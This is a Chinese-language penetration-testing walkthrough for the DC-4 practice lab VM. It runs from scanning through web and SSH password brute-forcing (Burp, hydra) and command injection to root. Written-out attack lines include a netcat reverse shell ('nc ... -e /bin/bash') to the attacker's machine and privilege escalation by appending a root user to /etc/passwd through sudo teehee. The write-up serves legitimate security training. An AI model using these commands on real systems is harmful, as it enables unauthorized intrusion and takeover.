靶机描述
下载地址:http://www.five86.com/downloads/DC-4.zip
1  | DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.  | 
信息收集
扫描同网段存活主机
1  | arp-scan -l  | 

扫描开放端口,发现开放的22端口和80端口
1  | nmap -A 172.18.1.138  | 

访问80端口,是一个web应用,页面只有一个登录框

尝试扫描后台文件
1  | dirsearch -u http://172.18.1.138/ -e * -i 200  | 

Web攻击
尝试密码爆破web页面,采用bp抓包重放

发送到Intruder模块,然后设置参数
根据页面信息显示,该页面是管理员登录界面,可以猜测用户名为admin,剩下就只需要爆破密码就可以


然后开始攻击
根据返回报的大小,可以判断密码为happy


有了账号密码可以去登录页面

页面提供三个操作命令,抓包可以看到操作指令


发送到Repeater模块,更改参数可以看到不同的执行效果,也就是一个远程命令执行

反弹shell
利用这个点,查找一下是否有nc命令,我们可以利用nc来反弹shell
1  | which nc  | 

有了nc,就利用nc反弹shell
首先在kali监听端口
1  | nc -lvvp 1234  | 

然后用nc执行反弹shell
1  | nc 172.18.1.128 1234 -e /bin/bash  | 


利用python升级成交互型shell
1  | python -c 'import pty; pty.spawn("/bin/bash")'  | 

渗透阶段
切换到根目录,收集一些有用信息
首先发现存在三个用户

只有jim目录下有文件,一个backups,一个mbox,一个test.sh

先看backups下的文件,里面存的是一个使用过的密码文件,我们拷贝一份到桌面


再看一下mbox发现没有查看权限,test.sh只是一个打印输出的代码没有什么用处

考虑到服务器还开放了22号端口,提供了一份密码本,我们也清楚了用户,考虑爆破一下ssh登录
在桌面上创建一个用户名文本

使用hydra爆破ssh密码
1  | hydra(九头蛇)是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。  | 
1  | hydra -L user.txt -P password.txt 172.18.1.138 ssh  | 

得到ssh账号密码后,连接上去
1  | ssh jim@172.18.1.138  | 

继续进行信息收集,刚才没看到的那个mbox这次可以查看了
是一份邮件信息提示

查看客户端mail,输入编号查看对应的邮件

这里我们charles的密码了,切换用户

提权
查看当前用户能执行的命令权限
1  | sudo -l  | 

发现teehee具有root权限,尝试搜索teehee提权信息
1  | teehee命令可以往一个文件追加内容,可以通过它向/etc/passwd写入内容,新增一个超级用户  | 

提权成功!
查找flag
1  | find / -name *flag*  | 

查看flag
1  | cat /root/flag.txt  | 

总结
- bp爆破用户名账号密码
 - nc反弹shell
 - hydra爆破
 - linux mail命令查看邮件
 - teehee提权